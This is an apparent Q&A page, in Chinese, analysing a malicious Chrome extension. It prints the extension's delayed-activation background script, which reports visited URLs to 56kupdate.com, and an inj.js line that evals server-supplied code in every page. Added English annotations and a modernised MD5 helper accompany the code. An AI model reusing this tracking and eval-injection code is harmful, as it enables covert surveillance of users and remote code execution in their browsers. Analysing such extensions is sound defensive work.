这个JavaScript代码对MD5哈希的作用是什么?

时间:2014-07-10 16:47:30

标签: javascript deobfuscation

在Google Chrome插件中找到此代码:

trackurl值为https://56kupdate.com/,它似乎从https://56kupdate.com/?action=get_data获取了一些MD5值,这些值重定向到https://master.googlapi.com/v2/get_data.php但是用它们做了什么?

似乎将机密数据发送给56kupdate.com的所有者:https://plus.google.com/+BDClark0423/posts/cwHcB7o2KiM

// Analyst annotation of the extension's background loop (code left byte-identical;
// only comments added). The outer IIFE polls local storage until the extension has
// been installed for more than 7 days (604800000 ms) and only then starts the
// update/injection machinery below. A delayed activation of this kind is worth
// treating as a red flag on its own: the extension behaves normally during review
// and for the first week of use.
(function loop() {
    chrome.storage.local.get("extInfo", function (a) {
        // 604800000 ms = 7 days since the stored install_time.
        if (a.extInfo && a.extInfo.install_time && (new Date().getTime() - a.extInfo.install_time) > 604800000) {
            (function () {
                // c: Chrome version string taken from the User-Agent; sent with every report.
                var c = /Chrome\/([^ ]+)/.exec(window.navigator.userAgent)[1];
                // g: the extension's own manifest (version and current_locale are reported).
                var g = chrome.runtime.getManifest();
                // f: the most recent JSON document fetched from config.trackurl?action=get_data.
                var f;
                (function b() {
                    // f is emptied at the start of every fetch, so a failed fetch leaves it empty
                    // until the next day.
                    f = {};
                    $.ajax(config.trackurl, {
                        data: {
                            action: "get_data"
                        },
                        cache: false,
                        complete: function (i) {
                            var h = i.responseJSON;
                            if (!h) {
                                return
                            }
                            // `e` is never declared, so this leaks an implicit global.
                            for (e in h) {
                                f[e] = h[e]
                            }
                        }
                    });
                    // Re-fetch the remote document once a day (86400000 ms).
                    setTimeout(b, 86400000)
                })();
                // d: look up a hostname suffix in the remote "listener" table, which is keyed
                // by the MD5 of the hostname. Hashing the keys hides which sites are targeted
                // from anyone reading the server response, but it does not hinder a direct
                // lookup of a known hostname, nor brute-forcing the table with a domain list.
                var d = function (h) {
                    if (f && f.listener) {
                        return f.listener[MD5(h)]
                    }
                    return undefined
                };
                // l = message, v = sender, n = sendResponse (chrome.runtime.onMessage API).
                chrome.runtime.onMessage.addListener(function (l, v, n) {
                    var t, o;
                    // Matches dotted-quad IP literals; such hosts are skipped below.
                    var j = /\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/;
                    // h: report the page URL (p = ref) and the matched module names (i) to
                    // config.trackurl together with browser fingerprint data, then pass the
                    // server's raw response text back to the content script via n(). That text
                    // ends up in eval() in inj.js (quoted further down the page), so the server
                    // controls what runs in the page.
                    var h = function (p, i) {
                        $.ajax(config.trackurl, {
                            data: {
                                ref: encodeURIComponent(p),
                                "modules[]": i.length == 0 ? "" : i,
                                addon: "lostfriends",
                                addon_version: g.version,
                                browser: "chrome",
                                browser_version: c,
                                locale: g.current_locale
                            },
                            cache: false,
                            complete: function (m) {
                                n(m.responseText)
                            }
                        })
                    };
                    if (l.cmd == "getInj") {
                        // u: de-duplicated list of module names found for this hostname.
                        var u = [];
                        var k = l.payload;
                        if (!k) {
                            return
                        }
                        var q = k.domain.split(".");
                        if (q.length > 1 && !j.test(k.domain)) {
                            // Rebuild the hostname from its tail upwards ("example.com", then
                            // "www.example.com", ...); the bare TLD alone is never looked up.
                            t = q[q.length - 1];
                            for (var r = q.length - 2; r >= 0; --r) {
                                t = q[r] + "." + t;
                                o = d(t);
                                if (o) {
                                    // `e` leaks as an implicit global here as well.
                                    for (e in o) {
                                        if (u.indexOf(o[e]) == -1) {
                                            u.push(o[e])
                                        }
                                    }
                                }
                            }
                            // The page URL is reported even when no module matched.
                            if (u.length == 0) {
                                h(k.ref, []);
                                return true
                            }
                            h(k.ref, u)
                        }
                    }
                    // Returning true keeps the message channel open for the asynchronous n() call.
                    return true
                })
            })()
        } else {
            // Not yet 7 days since install: check again in 5 minutes (300000 ms).
            setTimeout(loop, 300000)
        }
    })
})();

还有一些带有此代码的MD5文件:

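/**
 * MD5 (RFC 1321) of a JavaScript string, returned as 32 lowercase hex digits.
 *
 * Input handling stays compatible with the original implementation: every
 * "\r\n" is first collapsed to "\n", then the text is UTF-8 encoded and the
 * digest is computed over those bytes. One defect is fixed: a surrogate pair
 * (a character outside the BMP, e.g. an emoji) is now encoded as a single
 * 4-byte UTF-8 sequence. The original encoded each half separately, producing
 * non-standard (CESU-8) bytes and therefore a digest that no other MD5
 * implementation would reproduce for such input. A lone surrogate is still
 * encoded as three bytes, as before.
 *
 * MD5 is not collision resistant and is unsuitable for integrity checks or
 * password protection. In the extension above it only disguises which
 * hostnames the remote "listener" table targets; hostnames are low-entropy,
 * so the table can be matched against any candidate domain list.
 *
 * @param {string} s - text to hash
 * @returns {string} the 128-bit digest as lowercase hexadecimal
 */
var MD5 = function (s) {
    // Per-step left-rotation amounts (RFC 1321 section 3.4), four rounds of 16.
    const SHIFTS = [
        7, 12, 17, 22, 7, 12, 17, 22, 7, 12, 17, 22, 7, 12, 17, 22,
        5, 9, 14, 20, 5, 9, 14, 20, 5, 9, 14, 20, 5, 9, 14, 20,
        4, 11, 16, 23, 4, 11, 16, 23, 4, 11, 16, 23, 4, 11, 16, 23,
        6, 10, 15, 21, 6, 10, 15, 21, 6, 10, 15, 21, 6, 10, 15, 21,
    ];
    // Additive constants T[i] = floor(abs(sin(i + 1)) * 2^32), in step order.
    const T = [
        3614090360, 3905402710, 606105819, 3250441966,
        4118548399, 1200080426, 2821735955, 4249261313,
        1770035416, 2336552879, 4294925233, 2304563134,
        1804603682, 4254626195, 2792965006, 1236535329,
        4129170786, 3225465664, 643717713, 3921069994,
        3593408605, 38016083, 3634488961, 3889429448,
        568446438, 3275163606, 4107603335, 1163531501,
        2850285829, 4243563512, 1735328473, 2368359562,
        4294588738, 2272392833, 1839030562, 4259657740,
        2763975236, 1272893353, 4139469664, 3200236656,
        681279174, 3936430074, 3572445317, 76029189,
        3654602809, 3873151461, 530742520, 3299628645,
        4096336452, 1126891415, 2878612391, 4237533241,
        1700485571, 2399980690, 4293915773, 2240044497,
        1873313359, 4264355552, 2734768916, 1309151649,
        4149444226, 3174756917, 718787259, 3951481745,
    ];

    /**
     * UTF-8 encode the CRLF-normalised text into an array of byte values.
     * Iterating with for...of yields whole code points, so a valid surrogate
     * pair arrives as one value >= 0x10000 while a lone surrogate arrives as
     * itself (and is encoded as three bytes, matching the old behaviour).
     * @param {string} text
     * @returns {number[]} bytes in 0..255
     */
    function toUtf8Bytes(text) {
        const bytes = [];
        for (const ch of text.replace(/\r\n/g, "\n")) {
            const cp = ch.codePointAt(0);
            if (cp < 0x80) {
                bytes.push(cp);
            } else if (cp < 0x800) {
                bytes.push(0xc0 | (cp >> 6), 0x80 | (cp & 0x3f));
            } else if (cp < 0x10000) {
                bytes.push(0xe0 | (cp >> 12), 0x80 | ((cp >> 6) & 0x3f), 0x80 | (cp & 0x3f));
            } else {
                bytes.push(
                    0xf0 | (cp >> 18),
                    0x80 | ((cp >> 12) & 0x3f),
                    0x80 | ((cp >> 6) & 0x3f),
                    0x80 | (cp & 0x3f),
                );
            }
        }
        return bytes;
    }

    /**
     * Pad the message (RFC 1321 sections 3.1-3.2) and pack it into little-endian
     * 32-bit words: message, one 0x80 byte, zeros, then the bit length as 64 bits.
     * @param {number[]} bytes
     * @returns {number[]} a multiple of 16 words
     */
    function toPaddedWords(bytes) {
        const byteLen = bytes.length;
        // Enough 64-byte blocks for message + 0x80 + the 8 length bytes.
        const wordCount = (Math.floor((byteLen + 8) / 64) + 1) * 16;
        const words = new Array(wordCount).fill(0);
        bytes.forEach((b, i) => {
            words[i >> 2] |= b << ((i & 3) * 8);
        });
        words[byteLen >> 2] |= 0x80 << ((byteLen & 3) * 8);
        // A JS string is far shorter than 2^32 bytes, so the high word is byteLen >>> 29.
        words[wordCount - 2] = byteLen << 3;
        words[wordCount - 1] = byteLen >>> 29;
        return words;
    }

    // Rotate a 32-bit value left by n bits (n is always 4..23 here, never 0).
    const rotl = (x, n) => (x << n) | (x >>> (32 - n));

    const words = toPaddedWords(toUtf8Bytes(s));
    // Initial state A, B, C, D (RFC 1321 section 3.3).
    let h0 = 0x67452301;
    let h1 = 0xefcdab89;
    let h2 = 0x98badcfe;
    let h3 = 0x10325476;

    for (let off = 0; off < words.length; off += 16) {
        let a = h0;
        let b = h1;
        let c = h2;
        let d = h3;
        for (let i = 0; i < 64; i++) {
            let f;
            let g;
            if (i < 16) {
                f = (b & c) | (~b & d);
                g = i;
            } else if (i < 32) {
                f = (d & b) | (~d & c);
                g = (5 * i + 1) % 16;
            } else if (i < 48) {
                f = b ^ c ^ d;
                g = (3 * i + 5) % 16;
            } else {
                f = c ^ (b | ~d);
                g = (7 * i) % 16;
            }
            // The sum stays below 2^34, exact in a double; ">>> 0" reduces it mod 2^32
            // and normalises the signed int32 results of the bitwise operators.
            const sum = (a + f + T[i] + words[off + g]) >>> 0;
            a = d;
            d = c;
            c = b;
            b = (b + rotl(sum, SHIFTS[i])) >>> 0;
        }
        h0 = (h0 + a) >>> 0;
        h1 = (h1 + b) >>> 0;
        h2 = (h2 + c) >>> 0;
        h3 = (h3 + d) >>> 0;
    }

    // Each state word is emitted least-significant byte first (toString(16) is lowercase).
    const hex = (w) => {
        let out = "";
        for (let i = 0; i < 4; i++) {
            out += ((w >>> (i * 8)) & 0xff).toString(16).padStart(2, "0");
        }
        return out;
    };
    return hex(h0) + hex(h1) + hex(h2) + hex(h3);
};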

此代码位于56kupdate.com服务器的最后一行:GJ96nJkfLF81YwNtXR1uL2yhqT9mnQftFJ50MJjtGJSwVR9GVSttZGOsBS8jXFOOpUOfMIqyLxgcqP81ZmphZmLtXRgVIR1ZYPOfnJgyVRqyL2giXFOQnUWioJHiZmZhZP4kAmHjYwRkAlOGLJMupzxiAGZ3YwZ2

并在inj.js文件中找到此代码:

// Content-script side (inj.js): asks the background page for "injections" for the
// current page, then evals whatever text comes back. The background listener above
// answers with the raw body of the config.trackurl response (n(m.responseText)), so
// the remote server decides what code runs in any page this script is injected
// into. A sendMessage callback feeding eval() is a direct indicator to search for
// when auditing an extension.
chrome.runtime.sendMessage({cmd:"getInj",payload:{domain:top.location.hostname,ref:top.location.href}},function(m){eval(m)});

1 个答案:

答案 0 :(得分:1)

  

但他们做了什么?

每天(通过b()函数)获取哈希值并存储在f对象中,d函数访问它们。

只要收到命令为getInj、有效负载中带有domain的消息事件,就会调用d函数。当该域不是IP地址(由j.test()正则表达式检查)时,它会被按点拆分,每个尾部(先是域名本身,然后是子域名,再是子子域名等)被依次传递给d,在那里对其做MD5哈希,并可能返回f中为该域存储的内容。然后,找到的内容连同消息的ref以及一些浏览器信息一起($.ajax(config.trackurl, …))被发送给跟踪器。